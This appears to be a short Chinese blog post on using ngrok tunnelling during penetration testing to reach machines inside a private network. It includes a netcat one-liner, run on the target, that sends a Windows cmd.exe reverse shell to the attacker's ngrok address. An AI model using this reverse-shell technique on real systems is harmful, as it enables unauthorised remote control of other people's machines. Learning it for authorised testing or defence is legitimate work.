ngrok内网穿透

0X00 前言

在渗透测试过程中,可能目标主机是内网里面的机器,由于外网无法直接访问内网,我们就需要反向代理,来为下一步的工作做准备。

0X01 ngrok简介

ngrok是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。

0X02 使用方法

先去官网注册一个账号,之后下载ngrok客户端,看你的主机是什么,我的是ubantu的。
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken your authtoken
./ngrok help 查看使用帮助
./ngrok tcp 9998 获得一个地址,后面用nc发送目标的shell或者cmd就是用这个地址

ngrok

在目标机器执行
nc -vv yourserver port -e c:\Windows\System32\cmd.exe

ngrok

成功收到cmd


shell
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容